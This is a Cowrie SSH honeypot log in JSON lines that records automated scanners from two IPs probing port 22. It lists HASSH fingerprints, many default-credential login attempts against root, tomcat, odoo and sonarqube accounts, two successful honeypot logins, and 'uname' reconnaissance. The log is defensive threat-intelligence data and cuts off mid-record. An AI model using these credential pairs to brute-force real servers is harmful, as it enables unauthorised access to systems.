{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:36.464096Z","src_ip":"212.227.235.229","session":"9ee0ab8c3df7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53422,"dst_ip":"1.2.3.4","dst_port":22,"session":"563bc19ea7fb","protocol":"ssh","message":"New connection: 212.227.235.229:53422 (1.2.3.4:22) [session: 563bc19ea7fb]","sensor":"my-vps","timestamp":"2025-08-31T06:24:36.653323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:24:36.653979Z","src_ip":"212.227.235.229","session":"563bc19ea7fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33903,"dst_ip":"1.2.3.4","dst_port":22,"session":"100380f3a5a3","protocol":"ssh","message":"New connection: 212.227.235.229:33903 (1.2.3.4:22) [session: 100380f3a5a3]","sensor":"my-vps","timestamp":"2025-08-31T06:24:36.672609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:24:36.674162Z","src_ip":"212.227.235.229","session":"100380f3a5a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:24:36.884032Z","src_ip":"212.227.235.229","session":"100380f3a5a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:24:36.913689Z","src_ip":"212.227.235.229","session":"563bc19ea7fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53244,"dst_ip":"1.2.3.4","dst_port":22,"session":"401050bc5138","protocol":"ssh","message":"New connection: 212.227.235.229:53244 (1.2.3.4:22) [session: 401050bc5138]","sensor":"my-vps","timestamp":"2025-08-31T06:24:37.590357Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:24:37.722181Z","src_ip":"212.227.235.229","session":"100380f3a5a3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:37.932693Z","src_ip":"212.227.235.229","session":"100380f3a5a3"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:37.933700Z","src_ip":"212.227.235.229","session":"460bcf5cb9b6"}
{"eventid":"cowrie.login.failed","username":"myuser","password":"12345","message":"login attempt [myuser/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:24:37.981351Z","src_ip":"212.227.235.229","session":"563bc19ea7fb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:24:38.317481Z","src_ip":"212.227.235.229","session":"401050bc5138"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:24:38.318553Z","src_ip":"212.227.235.229","session":"401050bc5138"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:39.245386Z","src_ip":"212.227.235.229","session":"563bc19ea7fb"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:24:44.416114Z","src_ip":"212.227.235.229","session":"401050bc5138"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:24:44.870179Z","src_ip":"212.227.125.160","session":"3a43256691a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:24:44.870967Z","src_ip":"212.227.125.160","session":"3a43256691a0"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:46.163849Z","src_ip":"212.227.235.229","session":"401050bc5138"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:51.131376Z","src_ip":"212.227.235.229","session":"94ebcd1b61b2"}
{"eventid":"cowrie.session.closed","duration":180.21726250648499,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:51.134595Z","src_ip":"212.227.235.229","session":"94ebcd1b61b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"7.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:52.527724Z","src_ip":"212.227.125.160","session":"3a43256691a0"}
{"eventid":"cowrie.session.closed","duration":"57.6","message":"Connection lost after 57.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:24:52.536884Z","src_ip":"212.227.125.160","session":"3a43256691a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42992,"dst_ip":"1.2.3.4","dst_port":22,"session":"80ec3384b5f1","protocol":"ssh","message":"New connection: 212.227.125.160:42992 (1.2.3.4:22) [session: 80ec3384b5f1]","sensor":"my-vps","timestamp":"2025-08-31T06:24:58.622063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:24:59.051748Z","src_ip":"212.227.125.160","session":"80ec3384b5f1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:24:59.052429Z","src_ip":"212.227.125.160","session":"80ec3384b5f1"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:01.138624Z","src_ip":"212.227.125.160","session":"80ec3384b5f1"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:25:02.921497Z","src_ip":"212.227.125.160","session":"80ec3384b5f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48972,"dst_ip":"1.2.3.4","dst_port":22,"session":"75b95f179e29","protocol":"ssh","message":"New connection: 212.227.235.229:48972 (1.2.3.4:22) [session: 75b95f179e29]","sensor":"my-vps","timestamp":"2025-08-31T06:25:10.980487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:25:10.981588Z","src_ip":"212.227.235.229","session":"75b95f179e29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:25:11.261075Z","src_ip":"212.227.235.229","session":"75b95f179e29"}
{"eventid":"cowrie.login.failed","username":"sonarqube","password":"sonarqube","message":"login attempt [sonarqube/sonarqube] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:12.395857Z","src_ip":"212.227.235.229","session":"75b95f179e29"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:25:12.536555Z","src_ip":"212.227.235.229","session":"6b68d7b633a3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:25:13.679296Z","src_ip":"212.227.235.229","session":"75b95f179e29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33678,"dst_ip":"1.2.3.4","dst_port":22,"session":"73edb20862bd","protocol":"ssh","message":"New connection: 212.227.125.160:33678 (1.2.3.4:22) [session: 73edb20862bd]","sensor":"my-vps","timestamp":"2025-08-31T06:25:21.996954Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:25:31.208746Z","src_ip":"212.227.235.229","session":"6b68d7b633a3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:25:31.209651Z","src_ip":"212.227.235.229","session":"6b68d7b633a3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:25:31.247152Z","src_ip":"212.227.125.160","session":"73edb20862bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:25:31.248147Z","src_ip":"212.227.125.160","session":"73edb20862bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":1702,"dst_ip":"1.2.3.4","dst_port":22,"session":"77f72c235f56","protocol":"ssh","message":"New connection: 212.227.125.160:1702 (1.2.3.4:22) [session: 77f72c235f56]","sensor":"my-vps","timestamp":"2025-08-31T06:25:34.014446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:25:34.015713Z","src_ip":"212.227.125.160","session":"77f72c235f56"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:25:34.096076Z","src_ip":"212.227.125.160","session":"77f72c235f56"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo","message":"login attempt [odoo/odoo] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:34.512446Z","src_ip":"212.227.125.160","session":"77f72c235f56"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"admin","message":"login attempt [odoo/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:35.595645Z","src_ip":"212.227.125.160","session":"77f72c235f56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59950,"dst_ip":"1.2.3.4","dst_port":22,"session":"38faf445f4e6","protocol":"ssh","message":"New connection: 212.227.235.229:59950 (1.2.3.4:22) [session: 38faf445f4e6]","sensor":"my-vps","timestamp":"2025-08-31T06:25:35.796089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:25:36.505858Z","src_ip":"212.227.235.229","session":"38faf445f4e6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:25:36.506638Z","src_ip":"212.227.235.229","session":"38faf445f4e6"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abc123","message":"login attempt [odoo/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:36.698838Z","src_ip":"212.227.125.160","session":"77f72c235f56"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abcd123","message":"login attempt [odoo/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:37.781944Z","src_ip":"212.227.125.160","session":"77f72c235f56"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abcd1234","message":"login attempt [odoo/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:38.865500Z","src_ip":"212.227.125.160","session":"77f72c235f56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59190,"dst_ip":"1.2.3.4","dst_port":22,"session":"97e1475a5eba","protocol":"ssh","message":"New connection: 212.227.235.229:59190 (1.2.3.4:22) [session: 97e1475a5eba]","sensor":"my-vps","timestamp":"2025-08-31T06:25:38.918512Z"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:25:39.948874Z","src_ip":"212.227.125.160","session":"77f72c235f56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"9.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:25:40.680885Z","src_ip":"212.227.235.229","session":"6b68d7b633a3"}
{"eventid":"cowrie.session.closed","duration":"74.7","message":"Connection lost after 74.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:25:40.682435Z","src_ip":"212.227.235.229","session":"6b68d7b633a3"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"password","message":"login attempt [tomcat/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:42.773723Z","src_ip":"212.227.235.229","session":"38faf445f4e6"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:25:44.588175Z","src_ip":"212.227.235.229","session":"38faf445f4e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34524,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b73bc3953d","protocol":"ssh","message":"New connection: 212.227.235.229:34524 (1.2.3.4:22) [session: b3b73bc3953d]","sensor":"my-vps","timestamp":"2025-08-31T06:25:48.760364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:25:48.761414Z","src_ip":"212.227.235.229","session":"b3b73bc3953d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.